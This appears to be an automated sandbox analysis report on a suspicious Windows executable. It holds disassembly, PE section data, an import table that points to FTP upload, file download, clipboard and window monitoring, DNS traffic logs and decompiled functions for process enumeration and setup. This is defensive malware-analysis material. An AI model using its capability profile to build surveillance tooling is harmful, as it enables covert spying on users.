mov dword ptr [eax], ecx
mov eax, dword ptr [00444758h]
mov eax, dword ptr [eax]
mov dword ptr [00455C14h], eax
call 00007F4964A1E080h
cmp dword ptr [004550A0h], ebx
jne 00007F4964A47B0Eh
push 0043E948h
call dword ptr [0044475Ch]
pop ecx
call 00007F4964A47C05h
push 00453078h
push 00453074h
call 00007F4964A47BF0h
mov eax, dword ptr [00455BF0h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [00455BECh]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [00444764h]
push 00453070h
push 00453000h
call 00007F4964A47BBDh

Rich Headers

Programming Language:
  • [C++] VS98 (6.0) SP6 build 8804
  • [EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x50b58          0x154         .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x56000          0x14cf8       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x44000          0xaa0         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type               Entropy         Characteristics
.text   0x1000           0x42469       0x43000   False     0.261452746035   COM executable for DOS  3.69971850757   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x44000          0xeb80        0xf000    False     0.221451822917   data                    3.38138099515   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x53000          0x2c20        0x3000    False     0.368815104167   data                    4.63470137622   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc   0x56000          0x14cf8       0x15000   False     0.0564778645833  data                    0.900735057676  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Imports

DLL: Imports
WININET.dll: FtpPutFileA, InternetConnectA, FtpSetCurrentDirectoryA, FtpCreateDirectoryA, InternetOpenA, InternetGetConnectedState, InternetCloseHandle
MFC42.DLL: (ordinal imports only, no named imports)
MSVCRT.dll: __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ?terminate@@YAXXZ, _except_handler3, _onexit, __dllonexit, ??1type_info@@UAE@XZ, getenv, strrchr, atoi, _ftol, time, difftime, fabs, floor, strcat, srand, __p__fmode, _stricmp, fopen, fwrite, fclose, strchr, memmove, strncpy, setlocale, isspace, _splitpath, _makepath, strcpy, _strlwr, strstr, wcscmp, strcmp, strncmp, malloc, free, sscanf, strlen, sprintf, _purecall, _CxxThrowException, memcpy, memset, __CxxFrameHandler, __set_app_type, rand, _itoa, wcslen, _setmbcp, _controlfp
KERNEL32.dll: CloseHandle, FlushViewOfFile, ReleaseMutex, WaitForSingleObject, CreateFileMappingA, MapViewOfFile, CreateMutexA, CreateFileA, DeviceIoControl, GetFileSize, MulDiv, lstrlenA, lstrcmpA, lstrcpynA, GlobalReAlloc, GlobalHandle, UnmapViewOfFile, LoadResource, LockResource, GlobalAlloc, GlobalFree, GlobalLock, GlobalUnlock, FindFirstFileA, GetComputerNameA, GetDateFormatA, GetTimeFormatA, GetVersionExA, OpenProcess, GetCurrentThreadId, WideCharToMultiByte, lstrlenW, MultiByteToWideChar, SetCurrentDirectoryA, SetFileTime, GetSystemTime, GetStartupInfoA, InterlockedDecrement, GetProcAddress, LoadLibraryA, FreeLibrary, lstrcpyA, ReadFile, WriteFile, lstrcmpiA, DeleteFileA, GetTimeZoneInformation, SetLastError, Sleep, GetTickCount, InitializeCriticalSection, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, FileTimeToSystemTime, SetFilePointer, GetFileInformationByHandle, SystemTimeToFileTime, GetLocalTime, CreateProcessA, lstrcatA, EnumResourceNamesA, CopyFileA, GetTempFileNameA, GetTempPathA, LocalFree, FormatMessageA, GetLastError, SizeofResource, RemoveDirectoryA, MoveFileA, CreateDirectoryA, GetSystemDirectoryA, GetModuleFileNameA, GetModuleHandleA, ExpandEnvironmentStringsA, GetCurrentProcessId, FindClose, FindResourceA, FindNextFileA
USER32.dll: GetDlgItemInt, GetDlgItemTextA, MessageBoxA, SetForegroundWindow, FindWindowA, GetWindowTextA, SetClipboardViewer, PostQuitMessage, ChangeClipboardChain, SetMenuDefaultItem, EnableMenuItem, wsprintfA, RegisterHotKey, UnregisterHotKey, LoadImageA, FillRect, DrawTextA, PtInRect, CharLowerA, GetWindowThreadProcessId, AttachThreadInput, CloseClipboard, GetClipboardData, OpenClipboard, IsClipboardFormatAvailable, IsWindowUnicode, LoadStringA, CharUpperBuffA, RedrawWindow, SetWindowLongA, InvalidateRect, MessageBeep, GetDlgCtrlID, DdeFreeStringHandle, IsWindowVisible, GetClassNameA, SendMessageTimeoutA, IsWindow, RegisterWindowMessageA, FindWindowExA, DestroyIcon, AppendMenuA, GetMenuItemCount, GetMenuItemInfoA, GetSubMenu, DrawFrameControl, OffsetRect, DrawIconEx, DrawEdge, GetSystemMetrics, SystemParametersInfoA, GetKeyboardLayout, MapVirtualKeyExA, MapVirtualKeyA, GetKeyNameTextA, EnumChildWindows, GetWindowLongA, IsDlgButtonChecked, GetForegroundWindow, PostMessageA, DdeClientTransaction, DdeGetData, GetSysColor, GetCursorPos, WindowFromPoint, GetCapture, GetWindowRect, GetFocus, InflateRect, CopyRect, DrawFocusRect, SetTimer, GetParent, GetWindowTextLengthA, GetNextDlgTabItem, SetFocus, GetDlgItem, CreatePopupMenu, CheckMenuItem, DdeCreateStringHandleA, GetKeyboardLayoutList, DdeConnect, SendMessageA, EnableWindow, GetDesktopWindow, GetDC, ReleaseDC, DdeFreeDataHandle, DdeDisconnect, DdeInitializeA, DdeUninitialize, KillTimer, DefWindowProcA, IsChild, LoadIconA, SetCursor, LoadCursorA, GetKeyboardLayoutNameA, GetClientRect
GDI32.dll: BitBlt, SelectObject, CreateCompatibleDC, CreatePen, CreateFontIndirectA, Rectangle, GetTextColor, CreateFontA, GetDIBits, CreateCompatibleBitmap, GetTextExtentPoint32A, CreateSolidBrush, SetTextColor, SetBkMode, DeleteDC, CreateDCA, GetStockObject, GetPaletteEntries, GetObjectA, CreateDIBitmap, CreatePalette, RealizePalette, PatBlt, DeleteObject, CreateBitmap
comdlg32.dll: GetOpenFileNameA
ADVAPI32.dll: RegOpenKeyA, RegSetValueExA, RegCreateKeyA, RegQueryValueExA, RegQueryValueA, RegDeleteValueA, RegCloseKey, RegDeleteKeyA, GetUserNameA, RegOpenKeyExA
SHELL32.dll: Shell_NotifyIconA, SHBrowseForFolderA, SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHFileOperationA, ShellExecuteA, ExtractIconExA
COMCTL32.dll: ImageList_Remove, ImageList_GetImageCount, ImageList_ReplaceIcon, InitCommonControlsEx
ole32.dll: CoUninitialize, CoInitialize, CoCreateInstance, CoFreeUnusedLibraries
OLEAUT32.dll: SysStringLen, VariantInit, VariantClear, SysAllocString, SysFreeString
urlmon.dll: URLDownloadToFileA
WSOCK32.dll: send, recv, closesocket, select, connect, WSACleanup, ntohl, WSAStartup, htons, ioctlsocket, gethostbyname, bind, WSASetLastError, socket, gethostname
MSVCP60.dll: ??0_Lockit@std@@QAE@XZ, ??1_Lockit@std@@QAE@XZ
RPCRT4.dll: UuidCreate, UuidToStringA, RpcStringFreeA

Network Behavior

Network Port Distribution

UDP Packets

Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Feb 23, 2021 17:39:25.233937979 CET  51281        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:39:25.285471916 CET  53           51281      8.8.8.8      192.168.2.3
Feb 23, 2021 17:39:26.376651049 CET  49199        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:39:26.428426981 CET  53           49199      8.8.8.8      192.168.2.3
Feb 23, 2021 17:39:28.041127920 CET  50620        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:39:28.100127935 CET  53           50620      8.8.8.8      192.168.2.3
Feb 23, 2021 17:39:28.905944109 CET  64938        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:39:28.973481894 CET  53           64938      8.8.8.8      192.168.2.3
Feb 23, 2021 17:39:29.322885990 CET  60152        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:39:29.392126083 CET  53           60152      8.8.8.8      192.168.2.3
Feb 23, 2021 17:39:30.896219969 CET  57544        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:39:30.944962025 CET  53           57544      8.8.8.8      192.168.2.3
Feb 23, 2021 17:39:31.976865053 CET  55984        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:39:32.029597998 CET  53           55984      8.8.8.8      192.168.2.3
Feb 23, 2021 17:39:33.256689072 CET  64185        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:39:33.305219889 CET  53           64185      8.8.8.8      192.168.2.3
Feb 23, 2021 17:39:34.683229923 CET  65110        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:39:34.736665964 CET  53           65110      8.8.8.8      192.168.2.3
Feb 23, 2021 17:39:35.631702900 CET  58361        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:39:35.680376053 CET  53           58361      8.8.8.8      192.168.2.3
Feb 23, 2021 17:39:36.559864044 CET  63492        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:39:36.617083073 CET  53           63492      8.8.8.8      192.168.2.3
Feb 23, 2021 17:39:37.945734978 CET  60831        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:39:37.994498968 CET  53           60831      8.8.8.8      192.168.2.3
Feb 23, 2021 17:39:39.115470886 CET  60100        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:39:39.164233923 CET  53           60100      8.8.8.8      192.168.2.3
Feb 23, 2021 17:39:39.239679098 CET  53195        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:39:39.288265944 CET  53           53195      8.8.8.8      192.168.2.3
Feb 23, 2021 17:39:40.260013103 CET  50141        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:39:40.308773994 CET  53           50141      8.8.8.8      192.168.2.3
Feb 23, 2021 17:39:41.080451965 CET  53023        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:39:41.129209995 CET  53           53023      8.8.8.8      192.168.2.3
Feb 23, 2021 17:39:42.294761896 CET  49563        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:39:42.354716063 CET  53           49563      8.8.8.8      192.168.2.3
Feb 23, 2021 17:39:43.181158066 CET  51352        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:39:43.232711077 CET  53           51352      8.8.8.8      192.168.2.3
Feb 23, 2021 17:39:44.147665024 CET  59349        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:39:44.196490049 CET  53           59349      8.8.8.8      192.168.2.3
Feb 23, 2021 17:39:45.087042093 CET  57084        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:39:45.135683060 CET  53           57084      8.8.8.8      192.168.2.3
Feb 23, 2021 17:39:58.153821945 CET  58823        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:39:58.212501049 CET  53           58823      8.8.8.8      192.168.2.3
Feb 23, 2021 17:40:05.136533022 CET  57568        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:40:05.185122967 CET  53           57568      8.8.8.8      192.168.2.3
Feb 23, 2021 17:40:18.742022038 CET  50540        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:40:18.799397945 CET  53           50540      8.8.8.8      192.168.2.3
Feb 23, 2021 17:40:27.437750101 CET  54366        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:40:27.509244919 CET  53           54366      8.8.8.8      192.168.2.3
Feb 23, 2021 17:40:46.809015036 CET  53034        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:40:46.857649088 CET  53           53034      8.8.8.8      192.168.2.3
Feb 23, 2021 17:40:52.416899920 CET  57762        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:40:52.480557919 CET  53           57762      8.8.8.8      192.168.2.3
Feb 23, 2021 17:41:21.967437983 CET  55435        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:41:22.018543959 CET  53           55435      8.8.8.8      192.168.2.3
Feb 23, 2021 17:41:23.779164076 CET  50713        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:41:23.839287043 CET  53           50713      8.8.8.8      192.168.2.3
Feb 23, 2021 17:42:21.578418970 CET  56132        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:42:21.638370037 CET  53           56132      8.8.8.8      192.168.2.3
Feb 23, 2021 17:42:22.242088079 CET  58987        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:42:22.302165985 CET  53           58987      8.8.8.8      192.168.2.3
Feb 23, 2021 17:42:22.883418083 CET  56579        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:42:22.943257093 CET  53           56579      8.8.8.8      192.168.2.3
Feb 23, 2021 17:42:23.421056032 CET  60633        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:42:23.480940104 CET  53           60633      8.8.8.8      192.168.2.3
Feb 23, 2021 17:42:24.035535097 CET  61292        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:42:24.092859030 CET  53           61292      8.8.8.8      192.168.2.3
Feb 23, 2021 17:42:24.596959114 CET  63619        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:42:24.646073103 CET  53           63619      8.8.8.8      192.168.2.3
Feb 23, 2021 17:42:25.192250013 CET  64938        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:42:25.252090931 CET  53           64938      8.8.8.8      192.168.2.3
Feb 23, 2021 17:42:25.980870962 CET  61946        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:42:26.029532909 CET  53           61946      8.8.8.8      192.168.2.3
Feb 23, 2021 17:42:27.071306944 CET  64910        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:42:27.119978905 CET  53           64910      8.8.8.8      192.168.2.3
Feb 23, 2021 17:42:27.595020056 CET  52123        53         192.168.2.3  8.8.8.8
Feb 23, 2021 17:42:27.652151108 CET  53           52123      8.8.8.8      192.168.2.3

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Behavior

System Behavior

General

Start time:17:39:33
Start date:23/02/2021
Path:C:\Users\user\Desktop\executable.4420.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Desktop\executable.4420.exe'
Imagebase:0x400000
File size:438272 bytes
MD5 hash:6192CFBE8E44360F7C0B6F696206F41D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

General

Start time:17:39:35
Start date:23/02/2021
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 672
Imagebase:0x7ff7488e0000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Disassembly

Code Analysis

    Execution Graph

    Execution Coverage:3.2%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:7%
    Total number of Nodes:228
    Total number of Limit Nodes:7

    Graph


    Executed Functions

    Control-flow Graph

    C-Code - Quality: 100%
    			E00428AD2(void* __eflags) {
    				intOrPtr _t1;
    				struct HINSTANCE__* _t3;
    				_Unknown_base(*)()* _t6;
    				void* _t7;
    
    				_t1 = E00428A6B();
    				 *0x455ba0 = _t1;
    				if(_t1 == 0) {
    					L6:
    					return 0;
    				} else {
    					_t3 = LoadLibraryA("psapi.dll"); // executed
    					 *0x455ba4 = _t3;
    					if(_t3 == 0) {
    						goto L6;
    					} else {
    						 *0x455bac = GetProcAddress(_t3, "EnumProcessModules");
    						 *0x455ba8 = GetProcAddress( *0x455ba4, "GetModuleFileNameExA");
    						_t6 = GetProcAddress( *0x455ba4, "EnumProcesses");
    						 *0x455bb0 = _t6;
    						if( *0x455bac == 0 ||  *0x455ba8 == 0 || _t6 == 0) {
    							goto L6;
    						} else {
    							_t7 = 1;
    							return _t7;
    						}
    					}
    				}
    			}

    APIs
      • Part of subcall function 00428A6B: GetVersionExA.KERNEL32(?), ref: 00428A85
    • LoadLibraryA.KERNELBASE(psapi.dll,0041FE5E), ref: 00428AE5
    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00428B01
    • GetProcAddress.KERNEL32(GetModuleFileNameExA), ref: 00428B13
    • GetProcAddress.KERNEL32(EnumProcesses), ref: 00428B25
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: AddressProc$LibraryLoadVersion
    • String ID: EnumProcessModules$EnumProcesses$GetModuleFileNameExA$psapi.dll
    • API String ID: 1968650500-3062786360
    • Opcode ID: f060149e132810915e641629d8c78e5ec8218e828fa11d84e69ada51e686cae7
    • Instruction ID: 5c9e6db52fca0022f8977f22b24905a990c7f778f2a21f598c3b04332453e4a3
    • Opcode Fuzzy Hash: f060149e132810915e641629d8c78e5ec8218e828fa11d84e69ada51e686cae7
    • Instruction Fuzzy Hash: 3CF0ECB06027249FD7115B21FC2A77A7EA4AB40706F94003FB900DA5A2DB78A484DB4C
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 100%
    			E00428DCB(CHAR* _a4) {
    				struct _WIN32_FIND_DATAA _v324;
    				void* _t7;
    				void* _t9;
    
    				memset( &_v324, 0, 0x140);
    				_t7 = FindFirstFileA(_a4,  &_v324); // executed
    				if(_t7 != 0xffffffff) {
    					FindClose(_t7);
    					_t9 = 1;
    					return _t9;
    				} else {
    					return 0;
    				}
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Find$CloseFileFirstmemset
    • String ID:
    • API String ID: 2611062832-0
    • Opcode ID: d6f0edde9df49e277392e37ccd00278349f30f8cddbbda18d330cbcca89b8f45
    • Instruction ID: f196aed3ee99aef89ef7abe1f0f0b5db278bb693bbe45fd8c5518458ceb93445
    • Opcode Fuzzy Hash: d6f0edde9df49e277392e37ccd00278349f30f8cddbbda18d330cbcca89b8f45
    • Instruction Fuzzy Hash: 3CE0867190010466DB1157B2AC4BBDA366C5718318F400661FB19D50E0E7B5E5944AD4
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 80%
    			E00420972(intOrPtr __ecx, void* __eflags, void* __fp0) {
    				struct HWND__* _t70;
    				intOrPtr* _t74;
    				intOrPtr _t78;
    				struct HFONT__* _t85;
    				char _t88;
    				long _t93;
    				signed int _t114;
    				void* _t118;
    				intOrPtr _t123;
    				void* _t125;
    				void* _t135;
    
    				_t135 = __fp0;
    				E0043E4E0(0x441fba, _t125);
    				_t123 = __ecx;
    				_push( *((intOrPtr*)(_t125 + 8)));
    				 *((intOrPtr*)(_t125 - 0x10)) = __ecx;
    				_push(0x66);
    				L0043E054();
    				 *((intOrPtr*)(__ecx + 0x6c)) = 0x44615c;
    				 *((intOrPtr*)(_t125 - 4)) = 0;
    				 *((intOrPtr*)(__ecx + 0x70)) = 0;
    				 *((char*)(_t125 - 4)) = 1;
    				E0041FFA7(__ecx + 0x78);
    				 *((intOrPtr*)(__ecx + 0x898)) = 0;
    				 *((intOrPtr*)(__ecx + 0xd4c)) = 0;
    				 *((intOrPtr*)(__ecx + 0x1200)) = 0;
    				 *((intOrPtr*)(__ecx + 0x16b4)) = 0;
    				 *((char*)(_t125 - 4)) = 6;
    				E0040BA17(__ecx + 0x16b8);
    				L0043DDD8();
    				 *((char*)(_t125 - 4)) = 7;
    				E00420BE7(__ecx + 0x276c);
    				_t118 = 0x4558c8;
    				_push("pk.bin");
    				_push(0x4558c8);
    				_push(_t125 + 8);
    				 *((char*)(_t125 - 4)) = 8;
    				 *((intOrPtr*)(__ecx)) = 0x4493d8;
    				 *((intOrPtr*)(__ecx + 0x2750)) = 0;
    				 *((intOrPtr*)(__ecx + 0x2754)) = 0;
    				 *((intOrPtr*)(__ecx + 0x2758)) = 0;
    				 *((intOrPtr*)(__ecx + 0x2768)) = 0;
    				 *((intOrPtr*)(__ecx + 0x275c)) = 0;
    				 *((intOrPtr*)(__ecx + 0x2760)) = 0;
    				 *((intOrPtr*)(__ecx + 0x60)) = 0;
    				 *((intOrPtr*)(__ecx + 0x2734)) = 0;
    				 *((char*)(__ecx + 0x274c)) = 0;
    				 *((char*)(__ecx + 0x2744)) = 0;
    				 *((char*)(__ecx + 0x3e4)) = 0;
    				 *((intOrPtr*)(__ecx + 0x68)) = 0;
    				 *((intOrPtr*)(__ecx + 0x64)) = 1;
    				L0043DE20();
    				 *((char*)(_t125 - 4)) = 9;
    				E0040BBE2(__ecx + 0x16b8,  *((intOrPtr*)(_t125 + 8))); // executed
    				 *((char*)(_t125 - 4)) = 8;
    				L0043DD36();
    				if( *((intOrPtr*)(__ecx + 0x1805)) == 0) {
    					_push(0x4558c8);
    					L0043DFCA();
    				} else {
    					_t88 =  *0x4550cc; // 0x0
    					 *(_t125 - 0x150) = _t88;
    					_t114 = 0x40;
    					memset(_t125 - 0x14f, 0, _t114 << 2);
    					asm("stosw");
    					asm("stosb");
    					_t93 = ExpandEnvironmentStringsA(_t123 + 0x1808, _t125 - 0x150, 0x102);
    					_t133 = _t93;
    					if(_t93 != 0) {
    						_push(_t125 - 0x150);
    						L0043DDD2();
    					}
    					CreateDirectoryA( *0x4558c4, 0); // executed
    					_t118 = 0x4558c8;
    				}
    				 *((intOrPtr*)(_t123 + 0x273c)) = 0;
    				 *((intOrPtr*)(_t123 + 0x2730)) = 0;
    				_t70 = GetForegroundWindow(); // executed
    				 *(_t123 + 0x2748) = _t70;
    				 *((intOrPtr*)(_t123 + 0x2764)) = GetProcAddress(GetModuleHandleA("user32.dll"), "SendInput");
    				E0042211B(_t123, _t133); // executed
    				_push("mc.dat");
    				_t74 = _t125 + 8;
    				_push(_t118);
    				_push(_t74);
    				L0043DE20();
    				_push( *_t74);
    				 *((char*)(_t125 - 4)) = 0xa;
    				E00428731(_t123 + 0xd50); // executed
    				 *((char*)(_t125 - 4)) = 8;
    				L0043DD36();
    				_t78 = E0041AFA6(_t123 + 0x1d4c, _t123 + 0x1d8c); // executed
    				 *((intOrPtr*)(_t123 + 0x2728)) = _t78;
    				if(_t78 == 0) {
    					E0041B04D(_t135); // executed
    				}
    				lstrcpynA(_t123 + 0x1dcc, _t123 + 0x1dcc, 0x3f); // source == destination: truncates the string in place to at most 62 characters
    				 *((intOrPtr*)(_t123 + 0x2738)) = 0;
    				 *((intOrPtr*)(_t123 + 0x74)) = 0;
    				GetObjectA(GetStockObject(0x11), 0x3c, _t125 - 0x4c); // 0x11 == DEFAULT_GUI_FONT, 0x3c == sizeof(LOGFONTA)
    				 *((intOrPtr*)(_t125 - 0x3c)) = 0x2bc; // LOGFONTA.lfWeight (offset 0x10) = 700 == FW_BOLD
    				_t85 = CreateFontIndirectA(_t125 - 0x4c); // executed
    				_push(_t85);
    				L0043DD60();
    				 *[fs:0x0] =  *((intOrPtr*)(_t125 - 0xc));
    				return _t123;
    			}

    Instruction addresses (one per decompiled line, in listing order; 0x00000000 marks a line with no address of its own):
    0x00420972 0x00420977 0x00420985 0x00420987 0x0042098a 0x0042098d 0x0042098f 0x00420996 0x0042099d 0x004209a0
    0x004209a6 0x004209aa 0x004209af 0x004209b5 0x004209bb 0x004209c1 0x004209cd 0x004209d1 0x004209dc 0x004209e7
    0x004209eb 0x004209f0 0x004209f5 0x004209fd 0x004209fe 0x004209ff 0x00420a03 0x00420a09 0x00420a0f 0x00420a15
    0x00420a1b 0x00420a21 0x00420a27 0x00420a2d 0x00420a30 0x00420a36 0x00420a3c 0x00420a42 0x00420a48 0x00420a4b
    0x00420a52 0x00420a5f 0x00420a63 0x00420a6b 0x00420a6f 0x00420a7a 0x00420ad9 0x00420adf 0x00420a7c 0x00420a7c
    0x00420a83 0x00420a89 0x00420a92 0x00420a94 0x00420a96 0x00420aaa 0x00420ab0 0x00420ab2 0x00420abf 0x00420ac0
    0x00420ac0 0x00420acc 0x00420ad2 0x00420ad2 0x00420ae4 0x00420aea 0x00420af0 0x00420afb 0x00420b15 0x00420b1b
    0x00420b20 0x00420b25 0x00420b28 0x00420b29 0x00420b2a 0x00420b2f 0x00420b37 0x00420b3b 0x00420b43 0x00420b47
    0x00420b5a 0x00420b63 0x00420b69 0x00420b6b 0x00420b6b 0x00420b7a 0x00420b83 0x00420b8e 0x00420b98 0x00420ba1
    0x00420ba9 0x00420baf 0x00420bb3 0x00420bc0 0x00420bc8

    APIs
    • __EH_prolog.LIBCMT ref: 00420977
    • #324.MFC42(00000066,?,?,00000000,00000000), ref: 0042098F
      • Part of subcall function 0041FFA7: __EH_prolog.LIBCMT ref: 0041FFAC
      • Part of subcall function 0041FFA7: #287.MFC42(?,?,00000000,?,004209AF,00000066,?,?,00000000,00000000), ref: 0041FFC2
      • Part of subcall function 0041FFA7: #6139.MFC42(00000000,000000C8,?,?,00000000,?,004209AF,00000066,?,?,00000000,00000000), ref: 0041FFE0
      • Part of subcall function 0041FFA7: time.MSVCRT ref: 00420006
      • Part of subcall function 0040BA17: memset.MSVCRT ref: 0040BA28
      • Part of subcall function 0040BA17: #3811.MFC42(?), ref: 0040BA8A
      • Part of subcall function 0040BA17: lstrcpyA.KERNEL32(?,00000000), ref: 0040BBAC
      • Part of subcall function 0040BA17: #800.MFC42 ref: 0040BBB1
